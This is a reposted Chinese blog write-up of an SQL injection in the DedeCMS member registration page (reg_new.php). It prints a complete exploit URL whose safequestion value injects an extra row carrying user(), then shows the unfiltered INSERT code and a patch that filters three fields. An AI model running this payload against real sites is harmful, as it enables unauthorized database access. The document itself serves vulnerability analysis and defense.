zoukankan      html  css  js  c++  java
  • dedecms /member/reg_new.php SQL Injection Vul

    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Dedecms会员中心注入漏洞


    2. 漏洞触发条件

    http://127.0.0.1/dedecms5.5/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=
    //把vdcode=slum改成当前的验证码

    Relevant Link:

    http://0day5.com/archives/1315
    http://www.odaysec.com/post/1cb671b0_2709bbf


    3. 漏洞影响范围
    4. 漏洞代码分析

    /member/reg_new.php

    ..
    $jointime = time();
    $logintime = time();
    $joinip = GetIP();
    $loginip = GetIP();
    $pwd = md5($userpwd); 
    
    $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
    
    //未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询
    $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
    `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
    VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
    '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; 
    
    if($dsql->ExecuteNoneQuery($inQuery))
    ..


    5. 防御方法

    /member/reg_new.php

    ..
    $jointime = time();
    $logintime = time();
    $joinip = GetIP();
    $loginip = GetIP();
    $pwd = md5($userpwd);
    /* 对$mtype、$safeanswer、$safequestion进行有效过滤 */
        $mtype = HtmlReplace($mtype,1);
        $safeanswer = HtmlReplace($safeanswer);
        $safequestion = HtmlReplace($safequestion);
    /* */
    
    $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
    
    $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
    `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
    VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
    '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
    if($dsql->ExecuteNoneQuery($inQuery))
    {
    ..


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    ASM:《X86汇编语言-从实模式到保护模式》第9章:实模式下中断机制和实时时钟
    iOS回顾笔记(07) -- UITableView的使用和性能优化
    appledoc导出iOS代码文档的使用和问题详解(干货篇)
    iOS回顾笔记(06) -- AutoLayout从入门到精通
    iOS回顾笔记(05) -- 手把手教你封装一个广告轮播图框架
    iOS回顾笔记(04) -- UIScrollView的基本使用详解
    iOS回顾笔记(03) -- 自定义View的封装和xib文件的使用详解
    iOS回顾笔记( 02 ) -- 由九宫格布局引发的一系列“惨案”
    iOS回顾笔记( 01 )-- XIB和纯代码创建应用的对比
    博客搬家
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4519267.html
Copyright © 2011-2022 走看看